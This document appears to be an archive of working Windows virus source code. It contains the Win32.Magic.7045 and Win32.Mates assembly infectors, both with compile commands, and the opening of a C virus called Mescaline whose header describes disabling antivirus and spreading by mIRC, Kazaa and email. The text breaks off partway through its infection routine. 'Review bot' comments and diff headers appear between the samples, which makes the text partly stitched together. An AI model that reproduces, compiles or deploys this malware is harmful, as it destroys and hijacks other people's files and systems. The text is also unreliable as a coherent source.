ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
Win32.Magic.7045 is a 7045 bytes runtime/direct action EXE virus. Infects
all files in all directories at drive C:, D:, E: and F:, when executed, by
every file in current directory and Windows directory, when executed, by
prepending the virus to the original EXE file.
Compile Win32.Magic.7045 with Turbo Assembler v 5.0 by typing:
TASM32 /M /ML /Q /ZD VOODOO.ASM
TLINK32 -Tpe -c -x -aa -r -v VOODOO.OBJ,,, IMPORT32
*
.386
.model flat
; KERNEL32.dll
extrn CopyFileA:proc
extrn CloseHandle:proc
extrn CreateFileMappingA:proc
extrn CreateProcessA:proc
extrn DeleteFileA:proc
extrn CreateFileA:proc
extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn FlushViewOfFile:proc
extrn GetCommandLineA:proc
extrn GetCurrentDirectoryA:proc
extrn GetExitCodeProcess:proc
extrn GetFileSize:proc
extrn ExitProcess:proc
extrn GetProcAddress:proc
extrn GetStartupInfoA:proc
extrn GlobalAlloc:proc
extrn GlobalFree:proc
extrn GlobalLock:proc
extrn GlobalUnlock:proc
extrn MapViewOfFile:proc
extrn ReadFile:proc
extrn SetCurrentDirectoryA:proc
extrn SetFileAttributesA:proc
extrn SetFileTime:proc
extrn Sleep:proc
extrn UnmapViewOfFile:proc
extrn lstrcpyA:proc
extrn GetModuleHandleA:proc
; USER32.dll
extrn MessageBoxA:proc
.data
VirusSize equ 1b85h ; Size of virus (7045 bytes)
nBufferLength equ 320h ; Size, in characters, of directory
; buffer
MAX_PATH equ 104h
FALSE equ 00h
TRUE equ 01h
FILE_ATTRIBUTE_DIRECTORY equ 10h
; The "file or directory" is a
; directory
FILE_ATTRIBUTE_ARCHIVE equ 20h ; The file is an archive file.
; Applications use this attribute to
; mark files for backup or removal.
CREATE_NEW equ 01h ; Creates a new file. The function
; fails if the specified file already
; exists.
OPEN_EXISTING equ 03h ; Opens the file. The function fails
; if the file does not exist.
FILE_SHARE_READ equ 01h ; Other open operations can be
; performed on the file for read
; access. If the CreateFile function
; is opening the client end of a
; mailslot, this flag is specified.
FILE_SHARE_WRITE equ 02h ; Other open operations can be
; performed on the file for write
; access.
GENERIC_WRITE equ 40000000h
; Specifies write access to the file.
; Data can be written to the file and
; the file pointer can be moved.
GENERIC_READ equ 80000000h
; Specifies read access to the file.
; Data can be read from the file and
; the file pointer can be moved.
PAGE_READWRITE equ 04h ; Gives read-write access to the
; committed region of pages
FILE_MAP_WRITE equ 02h ; Read-write access
NORMAL_PRIORITY_CLASS equ 20h ; Indicates a normal process with no
; special scheduling needs.
INVALID_HANDLE_VALUE equ -01h
STARTUPINFO struct
cb DWORD ? ; Specifies the size, in bytes, of the
; structure.
lpReserved DWORD ? ; Reserved. Set this member to NULL
; before passing the structure to
; CreateProcess
lpDesktop DWORD ? ; Points to a zero-terminated string
; that specifies either the name of
; the desktop only or the name of both
; the window station and desktop for
; this process
lpTitle DWORD ? ; For console processes, this is the
; title displayed in the title bar if
; a new console window is created
dwX DWORD ? ; Specifies the x offset, in pixels,
; of the upper left corner of a window
; if a new window is created. The
; offset is from the upper left corner
; of the screen
dwY DWORD ? ; Specifies the y offset, in pixels,
; of the upper left corner of a window
; if a new window is created. The
; offset is from the upper left corner
; of the screen
dwXSize DWORD ? ; Specifies the width, in pixels, of
; the window if a new window is
; created
dwYSize DWORD ? ; Specifies the height, in pixels, of
; the window if a new window is
; created
dwXCountChars DWORD ? ; Specifies the screen buffer width in
; character columns
dwYCountChars DWORD ? ; Specifies the screen buffer height
; in character rows
dwFillAttribute DWORD ? ; Specifies the initial text and
; background colors if a new console
; window is created
dwFlags DWORD ? ; This is a bit field that determines
; whether certain STARTUPINFO members
; are used when the process creates a
; window
wShowWindow WORD ? ; Specifies the default value the first
; time
cbReserved2 WORD ? ; Reserved; must be zero
lpReserved2 DWORD ? ; Reserved; must be NULL
hStdInput DWORD ? ; Specifies a handle that will be used
; as the standard input handle of the
; process
hStdOutput DWORD ? ; Specifies a handle that will be used
; as the standard output handle of the
; process
hStdError DWORD ? ; Specifies a handle that will be used
; as the standard error handle of the
; process
ends
FILETIME struct
dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of
; the file time
dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of
; the file time
ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ? ; Specifies the file attributes of the
; file found
ftCreationTime FILETIME <> ; Specifies the time the file was
; created
ftLastAccessTime FILETIME <> ; Specifies the time that the file was
; last accessed
ftLastWriteTime FILETIME <> ; Specifies the time that the file was
; last written to
nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value
; of the file size, in bytes
nFileSizeLow DWORD ? ; Specifies the low-order DWORD value
; of the file size, in bytes
dwReserved0 DWORD ? ; Reserved for future use
dwReserved1 DWORD ? ; Reserved for future use
cFileName BYTE MAX_PATH dup(?)
; A null-terminated string that is the
; name of the file
cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an
; alternative name for the file
ends
PROCESS_INFORMATION struct
hProcess DWORD ? ; Handle to the newly created process
hThread DWORD ? ; Handle to the primary thread of the
; newly created process
dwProcessId DWORD ? ; Global process identifier that can
; be used to identify a process
dwThreadId DWORD ? ; global thread identifiers that can
; be used to identify a thread
ends
szFileName db '*.EXE',00h ; Name of file to search for
szFileName_ db '*.*',00h ; " " " " " "
szCurDir db 'c:\',00h ; Name of new current directory
db 'Magic People-Voodoo People !',00h
db 00h
ProcessInformation PROCESS_INFORMATION <>
dwExitCode dd ? ; Termination status
dwFileHandle dd ? ; File handle
dwFileHandle_ dd ? ; File handle
dwMappingHandle dd ? ; File mapping handle
lpMappedView dd ? ; Starting address of the mapped view
dwFileSize dd ? ; Low-order doubleword of the file
; size
infect_flag db ? ; Infection flag
exit_flag db ? ; Exit flag
NumberOfBytesRead dd ? ; Number of bytes read
lpFileExtension dd ? ; Pointer to file extension
StartupInfo STARTUPINFO <>
szFileName__:
db 11ah dup(00h)
db 206h dup(?)
FindFileData WIN32_FIND_DATA <>
db 20eh dup(?)
cBuffer db VirusSize dup(?)
; Buffer that receives data
dwSearchHandle dd ? ; Search handle
dwSearchHandle_ dd ? ; Search handle
szCurDir_:
cBuffer_ db 320h dup(?) ; Buffer for current directory
szCurDir__:
cBuffer__ db 320h dup(?) ; Buffer for current directory
db 724h dup(?)
.code
code_begin:
push offset StartupInfo ; Address of STARTUPINFO structure
call GetStartupInfoA
call GetCommandLineA
mov esi,eax ; ESI = pointer to the command-line
; string for the current process
cmp byte ptr [esi+01h],':' ; Not Universal Naming Convention
; (UNC)?
je _lstrcpyA ; Equal? Jump to _lstrcpyA
inc eax ; Increase pointer to the command-line
; string for the current process
_lstrcpyA:
push eax ; EAX = address of string to copy
push offset szFileName__ ; Address of buffer
call lstrcpyA
lea esi,szFileName__ ; ESI = offset of szFileName__
find_dot_in_filename:
inc esi ; Increase pointer to the command-line
; string for the current process
cmp byte ptr [esi],'.' ; Found dot in filename?
jne find_dot_in_filename ; Not equal? Jump to
; find_dot_in_filename
mov byte ptr [esi+04h],00 ; Store zero at end of filename
mov [lpFileExtension],esi ; Store pointer to file extension
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
push OPEN_EXISTING ; How to create
push 00h ; Address of security descriptor
push FILE_SHARE_READ ; Share mode
push GENERIC_READ ; Access (read-write) mode
push offset szFileName__ ; Address of name of the file
call CreateFileA
mov [dwFileHandle],eax ; Store file handle
push eax ; EAX = file handle
push 00h ; Address of structure for data
push offset NumberOfBytesRead
; Address of number of bytes read
push VirusSize ; Number of bytes to read
push offset cBuffer ; Address of buffer that receives data
push eax ; Handle of file to read
call ReadFile
pop eax ; EAX = file handle
push 00h ; Address of high-order word for file
; size
push eax ; Handle of file to get size of
call GetFileSize
mov [dwFileSize],eax ; Store low-order doubleword of the
; file size
cmp eax,VirusSize ; First generation?
je virus_exit ; Equal? Jump to virus_exit
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov [esi],'MOC.' ; Store file extension
cmp [esi+05h],'$$$$' ; Temporarily disnfected file?
je _DeleteFileA ; Equal? Jump to _DeleteFileA
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
push CREATE_NEW + OPEN_EXISTING
; How to create
push 00h ; Address of security descriptor
push FILE_SHARE_READ + FILE_SHARE_WRITE
; Share mode
push GENERIC_READ + GENERIC_WRITE
; Access (read-write) mode
push offset szFileName__ ; Address of name of the file
call CreateFileA
mov [dwFileHandle_],eax ; Store file handle
push 00h ; Name of file-mapping object
push [dwFileSize] ; Low-order doubleword of object size
push 00h ; High-order doubleword of object size
push PAGE_READWRITE ; Protection for mapping object
push 00h ; Optional security attributes
push [dwFileHandle_] ; Handle of file to map
call CreateFileMappingA
mov [dwMappingHandle],eax ; Store file mapping handle
push [dwFileSize] ; Low-order doubleword of object size
push 00h ; Low-order doubleword of file offset
push 00h ; High-order doubleword of file offset
push FILE_MAP_WRITE ; Access mode
push eax ; File-mapping object to map into
; address space
call MapViewOfFile
mov [lpMappedView],eax ; Store starting address of the mapped
; view
push 00h ; Address of structure for data
push offset NumberOfBytesRead
; Address of number of bytes read
push [dwFileSize] ; Low-order doubleword of object size
push eax ; Address of buffer that receives data
push [dwFileHandle] ; Handle of file to read
call ReadFile
push 00h ; Number of bytes in range
push [lpMappedView] ; Starting address of the mapped view
call FlushViewOfFile
push [lpMappedView] ; Address where mapped view begins
call UnmapViewOfFile
push [dwMappingHandle] ; Handle of object to close
call CloseHandle
push [dwFileHandle_] ; Handle of object to close
call CloseHandle
push offset ProcessInformation
; Pointer to PROCESS_INFORMATION
push offset StartupInfo ; Pointer to STARTUPINFO
push 00h ; Pointer to current directory name
push 00h ; Pointer to new environment block
push NORMAL_PRIORITY_CLASS ; Creation flags
push 00h ; Handle inheritance flag
push 00h ; Pointer to thread security
; attributes
push 00h ; Pointer to process security
; attributes
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov byte ptr [esi+04h],' ' ; Store space at end of filename
push offset szFileName__ ; Pointer to command line string
push 00h ; Pointer to name of executable module
call CreateProcessA
jmp _CloseHandle
virus_exit:
mov [exit_flag],TRUE ; Exit code for all threads
_CloseHandle:
push [dwFileHandle] ; Handle of object to close
call CloseHandle
call infect_drives
cmp [exit_flag],TRUE ; Exit code for all threads?
je _ExitProcess ; Equal? Jump to _ExitProcess
_GetExitCodeProcess:
push offset dwExitCode ; Address to receive termination
; status
push [ProcessInformation.hProcess]
; Handle to the process
call GetExitCodeProcess
cmp [dwExitCode],00h ; No error?
je _CreateProcessA ; Equal? Jump to _CreateProcessA
jmp _GetExitCodeProcess
_CreateProcessA:
push offset ProcessInformation
; Pointer to PROCESS_INFORMATION
push offset StartupInfo ; Pointer to STARTUPINFO
push 00h ; Pointer to current directory name
push 00h ; Pointer to new environment block
push NORMAL_PRIORITY_CLASS ; Creation flags
push 00h ; Handle inheritance flag
push 00h ; Pointer to thread security
; attributes
push 00h ; Pointer to process security
; attributes
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov byte ptr [esi+04h],' ' ; Store space at end of filename
mov [esi],'EXE.' ; Store file extension
mov [esi+05h],'$$$$' ; Store command-line
push offset szFileName__ ; Pointer to command line string
push 00h ; Pointer to name of executable module
call CreateProcessA
_ExitProcess:
push 00h ; Exit code for all threads
call ExitProcess
_DeleteFileA:
push offset szFileName__ ; Address of name of file to delete
call DeleteFileA
jmp _ExitProcess
infect_drives proc near ; Infect drives
push offset cBuffer_ ; Address of buffer for current
; directory
push nBufferLength ; Size, in characters, of directory
; buffer
call GetCurrentDirectoryA
call infect_directories
mov ecx,04h ; Infect drive C:, D:, E: and F:
set_current_directory_loop:
push ecx ; ECX = counter
push offset szCurDir ; Address of name of new current
; directory
call SetCurrentDirectoryA
call infect_directories
inc byte ptr [szCurDir] ; Increase drive letter
pop ecx ; ECX = counter
loop set_current_directory_loop
push offset szCurDir_ ; Address of name of new current
; directory
call SetCurrentDirectoryA
jmp _FindNextFileA
ret ; Return
endp
infect_directories proc near ; Infect directories
push offset cBuffer__ ; Address of buffer for current
; directory
push nBufferLength ; Size, in characters, of directory
; buffer
call GetCurrentDirectoryA
push offset FindFileData ; Address of returned information
push offset szFileName_ ; Address of name of file to search
; for
call FindFirstFileA
mov [dwSearchHandle],eax ; Store search handle
_FindNextFileA:
push offset FindFileData ; Address of returned information
push [dwSearchHandle] ; Handle of search
call FindNextFileA
or eax,eax ; Function failed?
jz function_failed ; Zero? Jump to function_failed
cmp [FindFileData.cFileName],'.'
; Directory?
je _FindNextFileA ; Equal? Jump to _FindNextFileA
mov eax,[FindFileData.dwFileAttributes]
and eax,FILE_ATTRIBUTE_DIRECTORY
; Directory?
jz _FindNextFileA ; Zero? Jump to _FindNextFileA
push offset szCurDir__ ; Address of name of new current
; directory
call SetCurrentDirectoryA
push offset FindFileData.cFileName
; Address of name of new current
; directory
call SetCurrentDirectoryA
push offset FindFileData ; Address of returned information
push offset szFileName ; Address of name of file to search
; for
call FindFirstFileA
mov [dwSearchHandle_],eax ; Store search handle
cmp eax,INVALID_HANDLE_VALUE
je _FindNextFileA ; Function failed? Jump to
; _FindNextFileA
continue_a_file_search:
or eax,eax ; Function failed?
jz _FindNextFileA ; Zero? Jump to _FindNextFileA
call infect_file
push offset FindFileData ; Address of returned information
push [dwSearchHandle_] ; Handle of search
call FindNextFileA
jmp continue_a_file_search
function_failed:
ret ; Return
endp
infect_file proc near ; Infect file
push FILE_ATTRIBUTE_ARCHIVE ; Address of attributes to set
push offset FindFileData.cFileName
; Address of filename
call SetFileAttributesA
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
push OPEN_EXISTING ; How to create
push 00h ; Address of security descriptor
push FILE_SHARE_READ + FILE_SHARE_WRITE
; Share mode
push GENERIC_READ + GENERIC_WRITE
; Access (read-write) mode
push offset FindFileData.cFileName
; Address of name of the file
call CreateFileA
cmp eax,INVALID_HANDLE_VALUE
je _SetFileAttributesA ; Function failed? Jump to
; _SetFileAttributesA
mov [dwFileHandle],eax ; Store file handle
push 00h ; Address of high-order word for file
; size
push eax ; Handle of file to get size of
call GetFileSize
mov [dwFileSize],eax ; Store low-order doubleword of the
; file size
_CreateFileMappingA:
push eax ; EAX = low-order doubleword of the
; file size
push 00h ; Name of file-mapping object
push eax ; Low-order doubleword of object size
push 00h ; High-order doubleword of object size
push PAGE_READWRITE ; Protection for mapping object
push 00h ; Optional security attributes
push [dwFileHandle]
call CreateFileMappingA
mov [dwMappingHandle],eax ; Store file mapping handle
push 00h ; Low-order doubleword of file offset
push 00h ; High-order doubleword of file offset
push FILE_MAP_WRITE ; Access mode
push eax ; File-mapping object to map into
; address space
call MapViewOfFile
cmp [infect_flag],TRUE ; Infect file?
je infect_file_ ; Equal? Jump to infect_file_
mov esi,eax ; ESI = starting address of the mapped
; view
mov edi,[esi+3ch] ; EDI = offset of new executable (NE,
; LE,etc) header within disk file
cmp dword ptr [esi+edi],'EP'
; Portable Executable (PE)?
jne infect_exit ; Not equal? Jump to infect_exit
cmp [esi+6fh],'3NIW'
je infect_exit ; Equal? Jump to infect_exit
call _UnmapViewOfFile
mov [infect_flag],TRUE ; Infect file
mov eax,[dwFileSize] ; EAX = Low-order doubleword of the
; file size
add eax,VirusSize ; Add size of virus to low-order
; doubleword of the file size
jmp _CreateFileMappingA
infect_file_:
mov [infect_flag],FALSE ; Don't infect file
mov [lpMappedView],eax ; Store starting address of the mapped
; view
push edi esi ecx ; Save registers at stack
pushf ; Save flags at stack
add eax,[dwFileSize] ; Add low-order doubleword of the file
; size to starting address of the
; mapped view
add eax,VirusSize-01h ; Add size of virus minus one to
; starting address of the mapped view
mov edi,eax ; EDI = pointer to last byte of file
mov esi,[lpMappedView] ; ESI = starting address of the mapped
; view
add esi,[dwFileSize] ; Add low-order doubleword of the file
; size to starting address of the
; mapped view
mov ecx,[dwFileSize] ; ECX = low-order doubleword of the
; file size
dec esi ; ESI = pointer to last byte of
; original code
std ; Set direction flag
rep movsb ; Move original code to end of file
mov edi,[lpMappedView] ; EDI = starting address of the mapped
; view
xor eax,eax ; Zero EAX
mov ecx,VirusSize ; Store seven thousand and forty-five
; bytes
cld ; Clear direction flag
rep stosb ; Overwrite the first seven thousand
; and forty-five bytes of original
; code
mov edi,[lpMappedView] ; EDI = starting address of the mapped
; view
lea esi,cBuffer ; ESI = offset of cBuffer
mov ecx,VirusSize ; Move seven thousand and forty-five
; bytes
cld ; Clear direction flag
rep movsb ; Move virus to beginning of file
popf ; Load flags from stack
pop ecx esi edi ; Load registers from stack
infect_exit:
call _UnmapViewOfFile
push offset FindFileData.ftLastWriteTime-08h
; Time the file was last written
push offset FindFileData.ftLastAccessTime-04h
; Time the file was last accessed
push offset FindFileData.ftCreationTime
; Time the file was created
push [dwFileHandle] ; Identifies the file
call SetFileTime
push [dwFileHandle] ; Handle of object to close
call CloseHandle
_SetFileAttributesA:
push [FindFileData.dwFileAttributes]
; Address of attributes to set
push offset FindFileData.cFileName
; Address of filename
call SetFileAttributesA
ret ; Return
endp
_UnmapViewOfFile proc near ; Unmaps a mapped view of a file from
; the calling process's address space
; and close it
push [lpMappedView] ; Address where mapped view begins
call UnmapViewOfFile
push [dwMappingHandle] ; Handle of object to close
call CloseHandle
ret ; Return
endp
code_end:
end code_begin
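Review bot: The creation-disposition operand in the host-rebuild CreateFileA call is written as `push CREATE_NEW + OPEN_EXISTING` under the comment `How to create`, but dwCreationDisposition is an enumeration rather than a bit set: 1 + 3 = 4, which is a single different disposition (OPEN_ALWAYS in the Win32 headers, as far as I recall), not "create new or open existing". I would spell the operand as the value it really is, `OPEN_ALWAYS equ 04h` in the constant table and `push OPEN_ALWAYS ; dwCreationDisposition: open, create if missing`, so the commentary matches the call. The header block is also inconsistent with the code it annotates: `infect_directories` only searches `*.EXE` after descending into each immediate subdirectory of the current directory and of the C: to F: roots (the starting directory itself is never searched), and nothing in the import list or the code touches the Windows directory, so the sentence about "every file in current directory and Windows directory" should be corrected or dropped.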
+452
@@ -0,0 +1,452 @@
COMMENT#
____________________________________________________________________________________________
...:: Win32.Mates - Virus ::...
- Version 1.0 -
- by DiA /auXnet -
- (c)02 [GermanY] -
____________________________________________________________________________________________
+++++Disclaimer+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+I am NOT responsible for any damage that you do! You can need the code however you want...+
+My motherlanguage is not English, I hope you understand what I mean. +
+Feel FREE to write any Comments to +
+ DiA_hates_machine@gmx.de +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Why the Hell "Mates":
This Virus is written for all my Mates in real life!
How does it work:
- get da real host's name (.SYS)
- create a thread (Virus)
- run Host
Virus->
- start after five sek
- rename found .EXE file to .SYS
- copy itself in .EXE file
- if no more filez in current directory -> cd.. (with my method)
- infect again
- when no more fileZ check counter
- if no payload give full control to host
Payload:
- new counter method (via Get/Set CaretBlinkTime)
- set new caret blink time
- inc it
- 20 starts of da host???
- if yes set new caret blink time (-20) stop the mouse cursor and show a message
- if no inc it again and back to host
Special:
- the counter
- hide da fucking window (with TASM32)
- work with threads
Here comes da 1st geneartion:
;-----MatesSys.asm-----cut------------------------------------------------------------------
.386
.model flat
jumps
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
.data
oTitle db '°°°1st Generation°°°',0
oMsg db 'This is da 1st generation of Win32.Mates - Virus',10,13
db ' by DiA /auXnet',10,13
db 'Have Fun...',0
.code
start:
push 0
push offset oTitle
push offset oMsg
push 0
call MessageBoxA
push 0
call ExitProcess
end start
;---------------------cut-------------------------------------------------------------------
To Compile the Mates - ViruS:
tasm32 /z /ml /m3 Mates,,;
tlink32 -Tpe -c Mates,Mates,, import32.lib
To Compile the Mates - SYS:
tasm32 /z /ml /m3 MatesSys,,;
tlink32 -Tpe -c MatesSys,MatesSys,, import32.lib
rename MatesSys.exe Mates.sys
#
;-------------------------------------------------------------------------------------------
.386
.model flat
jumps
;-----needed API's--------------------------------------------------------------------------
extrn MessageBoxA :PROC
extrn SetConsoleTitleA :PROC
extrn SetCursorPos :PROC
extrn SetCaretBlinkTime :PROC
extrn SetWindowPos :PROC
extrn SetCurrentDirectoryA :PROC
extrn Sleep :PROC
extrn FindWindowA :PROC
extrn FindFirstFileA :PROC
extrn FindNextFileA :PROC
extrn CreateThread :PROC
extrn CloseHandle :PROC
extrn CopyFileA :PROC
extrn CreateProcessA :PROC
extrn GetCommandLineA :PROC
extrn GetCaretBlinkTime :PROC
extrn lstrcpyA :PROC
extrn ExitProcess :PROC
;-------------------------------------------------------------------------------------------
;-----data's for the Virus------------------------------------------------------------------
.data
oTitle db '[Win32.Mates Version 1.0]',0
oMsg db 'I WANNA SAY HELLO TO SOME MATES:',10,13
db ' o DeathRider - Colorado SuckZ, Bitch ;)',10,13
db ' o Herr H. - Smoke together!',10,13
db ' o Danny - Rock ''n Roll',10,13
db ' o Pascal - I need some weed...',10,13
db 'AND ALL THE OTHER FUCKERZ :)',10,13
db 'Ride On and THANX for all',10,13,10,13
db ' greetz DiA /auXnet',0
MyConsoleTitle db '.:.',0
FileMask db '*.EXE',0
WindowHandle dd 0
ThreadHandle dd 0
ThreadID dd 0
FindHandle dd 0
ProcessInfo dd 4 dup (0)
StartupInfo dd 4 dup (0)
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
TargetFile db 200d dup (0)
CreateFile db 200d dup (0)
VirusFile db 200d dup (0)
HostFile db 200d dup (0)
Directory db 200d dup (0)
;-------------------------------------------------------------------------------------------
;-----Rock 'n Roll--------------------------------------------------------------------------
.code
Mates:
;-------------------------------------------------------------------------------------------
;-----hide da window------------------------------------------------------------------------
mov eax,offset MyConsoleTitle
push eax
call SetConsoleTitleA
call Sleep5 ;it suckz without sleep
mov eax,offset MyConsoleTitle
xor ebx,ebx
push eax
push ebx
call FindWindowA
mov dword ptr [WindowHandle],eax
call Sleep5
mov eax,01
xor ebx,ebx
mov edx,20000
push ebx
push eax
push eax
push edx
push edx
push ebx
push dword ptr [WindowHandle]
call SetWindowPos
;-------------------------------------------------------------------------------------------
;-----create a thread (virus)---------------------------------------------------------------
mov eax,offset ThreadID
xor ecx,ecx
mov edx,offset RunMates
call MakeThread
;-------------------------------------------------------------------------------------------
;-----get hostname (.sys) and run it--------------------------------------------------------
call GetCommandLineA ;via command line
mov edx,offset VirusFile
push eax
push edx
call lstrcpyA
mov esi,offset VirusFile ;fuck da "
call GetPoint
add esi,4d
mov dword ptr [esi],00000000h
push offset VirusFile+1
push offset HostFile
call lstrcpyA
mov esi,offset HostFile
call GetPoint
mov dword ptr [esi],5359532Eh ;rename to .SYS
mov eax,offset ProcessInfo
xor ebx,ebx
mov ecx,10h
mov edx,offset StartupInfo
mov edi,offset HostFile
push eax ;run host
push edx
push ebx
push ebx
push ecx
push ebx
push ebx
push ebx
push edi
push edi
call CreateProcessA
Wait4Mates:
jmp Wait4Mates ;wait for da virus
;-------------------------------------------------------------------------------------------
;-----here startz da virus (after 5sek)-----------------------------------------------------
RunMates:
mov eax,5000
push eax ;wait 5sek before run
call Sleep
;-------------------------------------------------------------------------------------------
;-----cd.. with another method--------------------------------------------------------------
mov eax,offset HostFile
mov edx,offset Directory
push offset eax ;copy host name 2 directory
push offset edx
call lstrcpyA
mov esi,offset Directory
call GetPoint
mov edi,esi ;handle it in edi
mov dword ptr [edi],00000000h ;fuck da point
DotDot: ;it workz!
cmp byte ptr [edi],'\'
jz ClearAndSet
cmp byte ptr [edi],':' ;C:\ -> cd.. -> suckz
jz CheckBlink
dec edi
jmp DotDot
ClearAndSet:
inc edi
mov dword ptr [edi],00000000h
sub edi,2
mov eax,offset Directory
push eax
call SetCurrentDirectoryA
;-------------------------------------------------------------------------------------------
;-----infect some filez---------------------------------------------------------------------
mov eax,offset Win32FindData
mov edx,offset FileMask
push eax
push edx
call FindFirstFileA
mov dword ptr [FindHandle],eax
FindNext:
cmp eax,-1 ;error -> cd..
je DotDot
test eax,eax ;no more filez -> cd..
jz DotDot
mov eax,offset TargetFile
mov edx,offset CreateFile
push eax
push edx
call lstrcpyA
mov esi,offset CreateFile
call GetPoint
mov dword ptr [esi],5359532Eh ;rename to .SYS
mov eax,offset CreateFile
mov edx,offset TargetFile
mov ecx,01
call CopyIt
mov eax,offset TargetFile
mov edx,offset VirusFile+1
xor ecx,ecx
call CopyIt
mov eax,offset Win32FindData
push eax ;search more filez
push dword ptr [FindHandle]
call FindNextFileA
jmp FindNext
;-------------------------------------------------------------------------------------------
;-----the funny part ...the payload---------------------------------------------------------
CheckBlink:
call GetCaretBlinkTime ;kewl counter!
mov esi,eax ;handle it in esi
cmp esi,1520
ja Set1499 ;bigger
cmp esi,1500
jb Set1501 ;smaler than 1500 mil sek
GoOn:
cmp esi,1519
jne exit ;exit when not 1519
inc esi
call SetBlink ;inc da counter
mov eax,offset ThreadID
xor ecx,ecx
mov edx,offset Message
call MakeThread ;show a nice message
CursorSleep: ;fuck da cursor
mov eax,666
mov edx,999
push eax
push edx
call SetCursorPos
jmp CursorSleep ;foreva ;)
exit:
inc esi
call SetBlink ;inc da counter
xor eax,eax ;null
push eax
call ExitProcess ;give full control to host
Set1501:
mov esi,1501
call SetBlink
jmp GoOn
Set1499:
mov esi,1499 ;go from start
call SetBlink
jmp exit
ret ;thraedend
;-------------------------------------------------------------------------------------------
;-----Sleep5 procedure----------------------------------------------------------------------
Sleep5:
mov eax,05
push eax
call Sleep
ret
;-------------------------------------------------------------------------------------------
;-----GetPoint procedure--------------------------------------------------------------------
GetPoint:
cmp byte ptr [esi],'.'
jz PointFound
inc esi
jmp GetPoint
PointFound:
ret
;-------------------------------------------------------------------------------------------
;-----MakeThread procedure------------------------------------------------------------------
MakeThread:
push eax
push ecx
push ecx
push edx
push ecx
push ecx
call CreateThread
mov dword ptr [ThreadHandle],eax
push dword ptr [ThreadHandle]
call CloseHandle
ret
;-------------------------------------------------------------------------------------------
;-----Message Thread------------------------------------------------------------------------
Message:
mov eax,offset oTitle
mov edx,offset oMsg
xor ebx,ebx
push ebx
push eax
push edx
push ebx
call MessageBoxA
ret
;-------------------------------------------------------------------------------------------
;-----CopyIt procedure----------------------------------------------------------------------
CopyIt:
push ecx
push eax
push edx
call CopyFileA
ret
;-------------------------------------------------------------------------------------------
;-----SetBlink procedure--------------------------------------------------------------------
SetBlink:
push esi
call SetCaretBlinkTime
ret
;-------------------------------------------------------------------------------------------
end Mates
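Review bot: The `COMMENT#` header describes intent but not the concrete artifacts this code leaves, which is the first thing an analyst reading an archived sample needs; I would add them to that header rather than touch the code. From the visible lines: the original host is kept beside the infected `.EXE` under the same name with a `.SYS` extension (the `5359532Eh` store at the `GetPoint` result), the run counter is persisted in the system caret blink time and held in the 1500–1520 ms band (`CheckBlink`), the console window is retitled `.:.` and moved to (20000,20000) via `SetWindowPos`, and the launcher spins in `Wait4Mates: jmp Wait4Mates` for the life of the host, so the infected process stays pegged on one CPU. A suggested header line: `; artifacts: <host>.SYS beside each infected .EXE; caret blink time 1500-1520 used as counter; console title ".:."`.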
+657
@@ -0,0 +1,657 @@
/*
Mescaline Virus 2003 DR-EF All Right Reserved
================================================
When Infected File Is Run The Virus Do This Steps:
1) Get Virus Path & Command Line
2) Hide The Virus Process
3) Disable AntiViruses Monitors
4) Active The Payload
5) Go TSR & Infect Any EXE\SCR File After He Closed
6) Execute The Host
7) Modify Mirc To Send The Virus To Chatted Users
8) Infect Every EXE\SCR File In The First Ten Kazaa Shared Dirs
Every 25 Infections The Virus Use MAPI To Mail Himself To Address That
He Found In Temporary HTML Files.
*/
#include &lt;stdafx.h&gt;
#include &lt;stdio.h&gt;
#include &lt;malloc.h&gt;
#include &lt;tlhelp32.h&gt;
#include &lt;shellapi.h&gt;
#include &lt;mapi.h&gt;
const virus_size=49160;
char viruscopyright[]="[Mescaline] Virus (c) 2oo3 DR-EF";
char VirusPath[MAX_PATH],VirusParameters[MAX_PATH],VirusTempFile[MAX_PATH];
tagPROCESSENTRY32 stproc;
char lst[150][MAX_PATH],addbook[300][MAX_PATH],htmfiles[300][MAX_PATH];
int Founded=0,Position;
/*------------------[File Infection Functions]---------------*/
void write_virus(char virus_path[],char WriteTo[],int Virus_Size)
{
FILE *File_Handle;
void *viruscode=malloc(Virus_Size);
File_Handle=fopen(virus_path,"rb");
if(File_Handle!=NULL)
{
fread(viruscode,Virus_Size,1,File_Handle);
fclose(File_Handle);
}
File_Handle=fopen(WriteTo,"wb");
if(File_Handle!=NULL)
{
fwrite(viruscode,Virus_Size,1,File_Handle);
fclose(File_Handle);
}
free(viruscode);
}
void Infect_file(char Virus_path[],char Victim[],char mark[])
{
char temp_file[MAX_PATH],check[sizeof(mark)];
int fsize,mcmp;
FILE *File_Handle;
HANDLE hfile,hfileDT;
DWORD attr;
FILETIME creation,access,change;
WIN32_FIND_DATA ffile;
File_Handle=fopen(Victim,"rb");
hfile=FindFirstFile(Victim,&ffile);
fsize=ffile.nFileSizeLow;
void *data=malloc(ffile.nFileSizeLow);
fread(data,fsize,1,File_Handle);
fseek(File_Handle,(fsize-sizeof(mark)),0);
fread(&check,sizeof(mark),1,File_Handle);
mcmp=memcmp(check,mark,sizeof(mark));
fclose(File_Handle);
if (mcmp!=0)
{
attr=GetFileAttributes(Victim);
SetFileAttributes(Victim,FILE_ATTRIBUTE_NORMAL);
hfileDT=CreateFile(Victim,GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ | FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0);
